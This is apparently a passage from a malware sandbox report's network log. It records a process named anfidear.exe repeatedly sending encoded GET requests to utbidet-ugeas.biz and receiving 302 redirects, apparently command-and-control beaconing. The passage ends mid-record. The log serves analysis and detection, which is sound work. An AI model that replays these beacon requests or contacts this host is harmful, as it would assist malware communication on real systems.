                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    40192.168.2.1249800172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:52.430787086 CEST161OUTGET /d/N?0208E0CC2308E0CC233AE0E02308E0EE7F1C0406B108E0FA0D3ACEF51138D0E223 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:52.916348934 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:52 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?0208E0CC2308E0CC233AE0E02308E0EE7F1C0406B108E0FA0D3ACEF51138D0E223
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    41192.168.2.1249802172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:53.055766106 CEST161OUTGET /d/N?025DBFE07E5DBFE07E6FBFCC7E5DBFC222495B2AEC5DBFD6506F91D94C6D8FCE7E HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:53.537456036 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:53 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?025DBFE07E5DBFE07E6FBFCC7E5DBFC222495B2AEC5DBFD6506F91D94C6D8FCE7E
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    42192.168.2.1249804172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:56.165196896 CEST161OUTGET /d/N?024449ADAD4449ADAD764981AD44498FF150AD673F44499B837667949F747983AD HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:56.629555941 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:56 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?024449ADAD4449ADAD764981AD44498FF150AD673F44499B837667949F747983AD
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    43192.168.2.1249806172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:57.654464960 CEST161OUTGET /d/N?02EC71869EEC71869EDE71AA9EEC71A4C2F8954C0CEC71B0B0DE5FBFACDC41A89E HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:58.176081896 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:58 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02EC71869EEC71869EDE71AA9EEC71A4C2F8954C0CEC71B0B0DE5FBFACDC41A89E
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    44192.168.2.1249808172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:58.548954964 CEST161OUTGET /d/N?020F9A8A020F9A8A023D9AA6020F9AA85E1B7E40900F9ABC2C3DB4B3303FAAA402 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:59.053275108 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:58 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?020F9A8A020F9A8A023D9AA6020F9AA85E1B7E40900F9ABC2C3DB4B3303FAAA402
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    45192.168.2.1249810172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:34:59.186029911 CEST161OUTGET /d/N?0206E4282306E4282334E4042306E40A7F1200E2B106E41E0D34CA111136D40623 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:34:59.687227011 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:34:59 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?0206E4282306E4282334E4042306E40A7F1200E2B106E41E0D34CA111136D40623
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    46192.168.2.1249812172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:01.008920908 CEST161OUTGET /d/N?02F561B7A4F561B7A4C7619BA4F56195F8E1857D36F561818AC74F8E96C55199A4 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:01.504076004 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:01 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02F561B7A4F561B7A4C7619BA4F56195F8E1857D36F561818AC74F8E96C55199A4
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    47192.168.2.1249814172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:02.640810966 CEST161OUTGET /d/N?02F2BD8324F2BD8324C0BDAF24F2BDA178E65949B6F2BDB50AC093BA16C28DAD24 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:03.141856909 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:03 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02F2BD8324F2BD8324C0BDAF24F2BDA178E65949B6F2BDB50AC093BA16C28DAD24
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    48192.168.2.1249817172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:04.430778980 CEST161OUTGET /d/N?0214ACBE3414ACBE3426AC923414AC9C68004874A614AC881A26828706249C9034 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:04.910684109 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:04 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?0214ACBE3414ACBE3426AC923414AC9C68004874A614AC881A26828706249C9034
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    49192.168.2.1249819172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:05.394638062 CEST161OUTGET /d/N?0294F1587E94F1587EA6F1747E94F17A22801592EC94F16E50A6DF614CA4C1767E HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:05.885556936 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:05 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?0294F1587E94F1587EA6F1747E94F17A22801592EC94F16E50A6DF614CA4C1767E
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    50192.168.2.1249821172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:06.712027073 CEST161OUTGET /d/N?02357B2A20357B2A20077B0620357B087C219FE0B2357B1C0E07551312054B0420 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:07.254245996 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:07 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02357B2A20357B2A20077B0620357B087C219FE0B2357B1C0E07551312054B0420
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    51192.168.2.1249823172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:07.402612925 CEST161OUTGET /d/N?02CA51CE61CA51CE61F851E261CA51EC3DDEB504F3CA51F84FF87FF753FA61E061 HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:07.887566090 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:07 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?02CA51CE61CA51CE61F851E261CA51EC3DDEB504F3CA51F84FF87FF753FA61E061
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    52192.168.2.1249825172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:08.618633986 CEST161OUTGET /d/N?020AA6280F0AA6280F38A6040F0AA60A531E42E29D0AA61E213888113D3A96060F HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:09.117150068 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:09 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                    Location: http://ww99.utbidet-ugeas.biz/d/N?020AA6280F0AA6280F38A6040F0AA60A531E42E29D0AA61E213888113D3A96060F
                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    53192.168.2.1249827172.234.222.138806212C:\Windows\SysWOW64\anfidear.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Sep 7, 2024 15:35:10.717966080 CEST161OUTGET /d/N?02386E18EE386E18EE0A6E34EE386E3AB22C8AD27C386E2EC00A4021DC085E36EE HTTP/1.0
                                                                                                                                                                    Host: utbidet-ugeas.biz
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                    Sep 7, 2024 15:35:11.207411051 CEST533INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                    Server: openresty
                                                                                                                                                                    Date: Sat, 07 Sep 2024 13:35:11 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                    Connection: close
